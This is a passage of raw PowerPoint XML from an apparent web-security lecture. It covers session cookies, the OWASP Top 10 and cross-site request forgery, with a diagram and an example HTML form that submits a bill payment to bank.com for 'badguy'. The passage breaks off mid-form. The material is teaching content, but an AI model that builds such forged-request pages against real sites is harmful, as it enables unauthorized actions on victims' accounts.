                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2504721" y="6457890"/>
            <a:ext cx="5948103" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>https://www.owasp.org/index.php/Top_10_2013-Top_10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5029200"/>
            <a:ext cx="8610600" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>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762000" y="1457960"/>
            <a:ext cx="7924800" cy="3571240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="63137"/>
            </a:srgbClr>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4560543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Recall: session using cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219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2" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172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3" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6388100" y="1785938"/>
            <a:ext cx="1046163"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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1319213" y="1785938"/>
            <a:ext cx="1271587"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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89095" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2438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6" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="3416300" y="2209800"/>
            <a:ext cx="2146300"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POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89097" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="4943475"/>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8" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="3581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9" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2667000" y="57912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100" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="2651125" y="3276600"/>
            <a:ext cx="3565525"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Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89101" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="3168650" y="4608513"/>
            <a:ext cx="2613025" cy="606425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89102" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-321107">
            <a:off x="3856038" y="5591175"/>
            <a:ext cx="1195387"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response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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Basic picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1CB60230-26B2-4122-A0D0-AB77677FE647}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2874963"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79877" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5951538" y="1855788"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79878" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="5173663"/>
            <a:ext cx="2436813" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90119" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5713413" y="4792663"/>
            <a:ext cx="1693862"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Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90120" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5554663" y="1428750"/>
            <a:ext cx="1760537"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Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79881"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type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90122" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4248150"/>
            <a:ext cx="1465263"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User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90123" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2763838" y="2070100"/>
            <a:ext cx="2068512"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establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79884" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1828800" y="4572000"/>
            <a:ext cx="2906713" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90125" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2655888" y="2786063"/>
            <a:ext cx="2449512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="798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90127" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3011488" y="4298950"/>
            <a:ext cx="3076575" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>visit server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90128" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2197100" y="4702175"/>
            <a:ext cx="2932113" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90129" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2378075" y="23018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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90130" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075"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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90131" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="1952625" y="4159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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79892" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438400" y="2963863"/>
            <a:ext cx="2830513" cy="617537"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90133" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="31242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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90134" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="6248400"/>
            <a:ext cx="6801029" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Q: how long do you stay logged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>to Gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>? Facebook? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="4022725" y="3097213"/>
            <a:ext cx="1212850" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>(w/ cookie)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1143000" y="3200400"/>
            <a:ext cx="6705600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>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91139" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="2438400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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80900" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="152400"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>Cross Site Request Forgery  (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96262" name="Rectangle 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1219200"/>
            <a:ext cx="7696200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User logs in to  bank.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Session cookie remains in browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits another site containing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form  name=F  action=http://bank.com/BillPay.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>           &lt;input  name=recipient   value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
